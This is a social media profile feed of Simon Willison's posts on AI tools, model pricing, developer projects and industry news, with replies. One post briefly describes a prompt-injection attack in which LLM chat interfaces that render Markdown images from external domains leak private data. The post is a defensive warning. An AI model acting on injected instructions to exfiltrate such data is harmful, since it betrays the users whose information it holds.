Email or username:

Password:

Forgot your password?
120 posts total
Simon Willison

New TIL: Using sqlite-vec with embeddings in sqlite-utils and Datasette til.simonwillison.net/sqlite/s

Simon Willison

OK gang! This is ready for you to test.

python tweet2html.py --css 1234

That will take a Twitter ID and return HTML and CSS for you to embed in your website with no calling back to Twitter.

Features:
🗣 Avatars inlined as Base64 WebP
📸 All attached photos inlined
🎥 Video poster inline, <video> to original source
🔗 Hyperlinks don't use t.co
#️⃣ Hashtags and @ mentions linked
🕰 Semantic time
♥ and 🗨 counts

Try it out at github.com/edent/Tweet2Embed

Feedback and pull requests very welcome!

OK gang! This is ready for you to test.

python tweet2html.py --css 1234

That will take a Twitter ID and return HTML and CSS for you to embed in your website with no calling back to Twitter.

Features:
🗣 Avatars inlined as Base64 WebP
📸 All attached photos inlined
🎥 Video poster inline, <video> to original source
🔗 Hyperlinks don't use t.co
#️⃣ Hashtags and @ mentions linked
🕰 Semantic time
♥ and 🗨 counts

Simon Willison

This 404 Media piece definitively answers the question about where all of the weird Jesus shrimp AI generated image slop on Facebook comes from, and it’s fascinating: 404media.co/where-facebooks-ai

A few of my own notes here: simonwillison.net/2024/Aug/10/

22

@simon I believe you invented the term “slop” right 😁 my question is, if “slop” is “unwanted AI-generated content” why is this called “slop” when it’s obviously getting a ton of engagement? Is the claim that all the likes are bots? If it’s actually hundreds of thousands of people liking AI-generated images then isn’t it … not unwanted?

Simon Willison

I spent some time reading the newly released GPT-4o System Card - it's a fascinating document, with all kinds of interesting new-to-me details in there. I've posted my highlights here: simonwillison.net/2024/Aug/8/g

I particularly enjoyed this bit about "scheming"

Lafncow :blobcatcoffee:

@simon "...it is unlikely that GPT-4o is capable of catastrophic scheming."

So either it's bad at it or really good at it.

Mans R

@simon Do they actually believe that stuff?

Simon Willison

Google announced a major price drop for their Gemini 1.5 Flash model today - it's now the cheapest of the mainstream cheap-and-fast models, and it can also handle PDF files, audio and video as well as images and text.

More notes here: simonwillison.net/2024/Aug/8/g

Clifford Adams

@simon
With all these price drops I'm waiting until they start paying me to use their models. 😜

Simon Willison

I got fed up of Claude's lack of a feature to export and share a full conversation, so I built a new tool for doing that using an Observable notebook - details here: simonwillison.net/2024/Aug/8/c

Here's an example shared transcript, in which I start by asking for advice on breeding spiders to catch flies and then keep on escalating until Claude is frantically advising me not to attract any bears to deal with the mountain lions that have surrounded my house: gist.github.com/simonw/95abdfa

I got fed up of Claude's lack of a feature to export and share a full conversation, so I built a new tool for doing that using an Observable notebook - details here: simonwillison.net/2024/Aug/8/c

Here's an example shared transcript, in which I start by asking for advice on breeding spiders to catch flies and then keep on escalating until Claude is frantically advising me not to attract any bears to deal with the mountain lions that have surrounded my house:

Show previous comments
Spencer

@simon This conversation is giving me strong "there was an old lady who swallowed a fly" vibes

Simon Willison

I've released a new reusable Django app - django-http-debug - which makes it easy to quickly setup a debugging HTTP endpoint that returns a canned response and logs full details of any incoming requests, great for the initial stages of implementing things like OAuth or incoming webhooks.

Most of the code was written for me by Claude 3.5 Sonnet - full details here: simonwillison.net/2024/Aug/8/d

Simon Willison

As part of working on this I figured out (with more help from Claude) a good pattern for writing automated tests for a reusable Django app like this that can live in the same repository and spin up a minimal Django project, just enough for the tests to run. I wrote that up in detail as this TIL: til.simonwillison.net/django/p

Glyph

@simon does this level of LLM “authorship” give you concerns about its provenance?

antrix

@simon do you use any IDE integrations to work with LLMs?

Simon Willison

Your regular reminder to never build a LLM-based chat interface with access to privileged information that can render Markdown images targetting external domains, if you don't want a prompt injection attack to be able to instantly exfiltrate that private data

Today's example is Google AI Studio: simonwillison.net/2024/Aug/7/g

It joins ChatGPT, Google Bard, writer.com, Amazon Q, Google NotebookLM and GitHub Copilot Chat in my collection of products that have made this mistake: simonwillison.net/tags/markdow

Your regular reminder to never build a LLM-based chat interface with access to privileged information that can render Markdown images targetting external domains, if you don't want a prompt injection attack to be able to instantly exfiltrate that private data

Today's example is Google AI Studio: simonwillison.net/2024/Aug/7/g

Colby Russell

@simon I guess I don't understand how this is an attack. The malicious prompt came from the attacker, but so did everything else. So the attacker already has access to the "exfiltrated" data, right?

Or is there some missing context here?

Simon Willison

@simon

minnesotareformer.com/2024/08/

> Walz also says maps help implement the nitty-gritty details of otherwise abstract policy. “You have to have a plan” for “how we’re doing power and economic justice and environmental justice,” he said. “The tools for that plan are GIS.” Those tools “transfer a vision of a fair society into one that actually has results.”
#HarrisWalz2024

Simon Willison

OK, turns out Tim Walz is a former geography teacher and a GIS and data visualization nerd
mastodon.social/@kjhealy/11291

Parsingphase

@simon So, Walz knows Where, and Harris knows Venn.

Andrew Harvey

@simon @kjhealy Do we know his opinions on the Mercator projection?

Steven Zekowski

@simon

minnesotareformer.com/2024/08/

> Walz also says maps help implement the nitty-gritty details of otherwise abstract policy. “You have to have a plan” for “how we’re doing power and economic justice and environmental justice,” he said. “The tools for that plan are GIS.” Those tools “transfer a vision of a fair society into one that actually has results.”
#HarrisWalz2024

Simon Willison

OpenAI announced "Structured Outputs in the API" today, which is a lot more exciting than it sounds and also came with a huge price drop (50% cheaper) for a new GPT-4o model - which makes it their new cheapest model for image inputs, since GPT-4o-mini is priced the same for image inputs as the previous, more expensive GPT-4o

My detailed notes here: simonwillison.net/2024/Aug/6/o

Jeff Triplett

@simon I did quite a bit of testing tonight I was surprised that structured outputs also worked with GPT-4o-mini. I didn’t crunch the numbers but I was already using it to parse text to json and I noticed an immediate improvement. I assumed we had to use the new model for pydantic support but it just worked.

Simon Willison

Weeknotes: a staging environment, a Datasette alpha and a bunch of new LLMs simonwillison.net/2024/Aug/6/s

Simon Willison

Fascinating report from 404 Media's Samantha Cole on a trove of leaked NVIDIA Slack messages and emails about how they're scraping millions of YouTube videos to train their own new foundation video generation model: 404media.co/nvidia-ai-scraping

Posted a few of my own notes here: simonwillison.net/2024/Aug/5/n

It's not surprising to learn that they're doing this - that's practically the industry standard right now - but is still really interesting to see internal details of what they're collecting and why

Fascinating report from 404 Media's Samantha Cole on a trove of leaked NVIDIA Slack messages and emails about how they're scraping millions of YouTube videos to train their own new foundation video generation model: 404media.co/nvidia-ai-scraping

Posted a few of my own notes here: simonwillison.net/2024/Aug/5/n

phillmv

@simon

every now and then i feel like im taking crazy pills because i remember when aaron swartz killed himself because he was going to go to jail forever because he scraped JSTOR,

and eleven years later your manager tells you “sshhhh it’s fine just scrape all of it don’t worry the CEO said it’s fine”

Lewis Cowles

@simon
Do you think Nvidia might become more chaos focused in future?

I genuinely worry about big AI companies becoming chaos agents.

Also do you think they are paying YouTube for that kind of access, or paying folks like youtube-downloader?

Simon Willison

It turns out Google Chrome ships a default, hidden extension that allows code on `*.google.com` access to private APIs, including your current CPU usage

You can test it out by pasting the following into your Chrome DevTools console on any Google page:

chrome.runtime.sendMessage(
"nkeimhogjdpnpccoofpliimaahmaaome",
{ method: "cpu.getInfo" },
(response) => {
console.log(JSON.stringify(response, null, 2));
},
);

More notes here: simonwillison.net/2024/Jul/9/h

It turns out Google Chrome ships a default, hidden extension that allows code on `*.google.com` access to private APIs, including your current CPU usage

You can test it out by pasting the following into your Chrome DevTools console on any Google page:

chrome.runtime.sendMessage(
"nkeimhogjdpnpccoofpliimaahmaaome",
{ method: "cpu.getInfo" },
(response) => {
console.log(JSON.stringify(response, null, 2));
},
);

Show previous comments
mirabilos

@simon @Shamar did you really have to point out that you used a theft machine (“AI”) to write that short JS snippet?

Ah. From your profile, you’re a promoter of these theft machines. Byebye…

Tann

@simon friendly reminder that you need root access to fully remove Google from many android phones and tablets and that root access generally voids your warranty. That said, most warranties don't last longer than a couple years so if you've had your phone for 2 or more years then you likely have little to lose by ripping your *.google.com applications out and replacing them with much more secure applications.

If you don't want to do that, the paid version of #netguard can at least lock down your phone's network traffic app by app and web address by web address.

@simon friendly reminder that you need root access to fully remove Google from many android phones and tablets and that root access generally voids your warranty. That said, most warranties don't last longer than a couple years so if you've had your phone for 2 or more years then you likely have little to lose by ripping your *.google.com applications out and replacing them with much more secure applications.

Simon Willison

Several of the major social media platforms - Instagram, TikTok, LinkedIn, Twitter - have effectively declared war on linking to things and I absolutely hate it

"Link in my bio" / "Link in thread" / "Link in first comment"... or increasingly no link at all, just an unsourced screenshot of a page

Show previous comments
Kat the Leopardess

@simon Thats why I cant listen to people make the opposite talking point about decentralized or alternative social media. People wanna stick to FB/Meta and the big platforms bc they need the exposure and consider things like the Fedisphere "too complicated"

....and yet you obviously are going to have to get more complicated in how you continue to get that exposure on places like Meta/Ig...by having to do workarounds for the link blocking.

Like, is that complacency really that much better and easier?

@simon Thats why I cant listen to people make the opposite talking point about decentralized or alternative social media. People wanna stick to FB/Meta and the big platforms bc they need the exposure and consider things like the Fedisphere "too complicated"

....and yet you obviously are going to have to get more complicated in how you continue to get that exposure on places like Meta/Ig...by having to do workarounds for the link blocking.

Adam Dalliance

@simon Email too. The more links in your email the more likely they are to put it in a spam folder.

tallship

@simon

A couple of things there Simon. How do you know this? Are you still using the deprecated, privacy mining, monolithic silos to which you refer, or are you just taking this on the word of good, 3rd party information sources?

If it's the former, why?

If it's the latter, then yippie kai yay! The demise of these platforms is underway and in full swing - just as Steve Ballmer once called Linux "Cancer", the fact that these silos aren't simply ignoring links to particular resources, especially those in the #Fediverse, and have taken up with the practice of actively blocking them, is a good thing; and you, as a #Fedizen, should be proud.

Yet again, if it is the former, and you really insist on validating and monetizing those privacy mining silos via your subjugation as inventoried chattel there, consider pinning something akin to the following to the top of your profile (make sure to read the alt-text for the image):

@simon

A couple of things there Simon. How do you know this? Are you still using the deprecated, privacy mining, monolithic silos to which you refer, or are you just taking this on the word of good, 3rd party information sources?

If it's the former, why?

If it's the latter, then yippie kai yay! The demise of these platforms is underway and in full swing - just as Steve Ballmer once called Linux "Cancer", the fact that these silos aren't simply ignoring links to particular resources, especially those in the

Simon Willison

Here's a brilliant neologism: "slop", for text generated entirely by LLMs and published, unwanted, on the Internet

> Watching in real time as "slop" becomes a term of art. the way that "spam" became the term for unwanted emails, "slop" is going in the dictionary as the term for unwanted AI generated content

Source: twitter.com/deepfates/status/1

Show previous comments
Random Geek

@simon @troublewithwords like “spam,” “slop” has that p-sound so you can really spit the word out when you’re mad.

⛈️ Information ⛈️

@simon I wish Fates would make the jump to Mastodon.

Simon Willison

I built a new tool: tools.simonwillison.net/ocr - it runs OCR against images and PDFs entirely in your browser (no file upload needed) using Tesseract.js and PDF.js

I wrote more about the tool and how I built it (with copious amounts of Claude 3 Opus and a little bit of ChatGPT) here: simonwillison.net/2024/Mar/30/

Show previous comments
gabi

@simon Insanely cool! It works fine in Android Chrome (no luck with Firefox though).

ResearchBuzz

@simon Damn, that's awesome! Queued for ResearchBuzz.

Simon Willison

I wrote about the AI trust crisis: when companies like Dropbox and OpenAI say "we won't train models or your private data", it's increasingly clear that a lot of people simply don't believe them.
simonwillison.net/2023/Dec/14/

Simon Willison

New release of shot-scraper, my CLI tool for taking screenshots of web pages (and scraping them with JavaScript) github.com/simonw/shot-scraper

Simon Willison

I wrote some notes about DALL-E 3, including reverse engineering some aspects of how it works. It's a fascinating insight into the prompt engineering that happens inside of OpenAI

**Now add a walrus: Prompt engineering in DALL-E 3**
simonwillison.net/2023/Oct/26/

Simon Willison

Published a short TIL about the very simple 2x2 CSS grid layout I used to display the images in that post til.simonwillison.net/css/simp

Go Up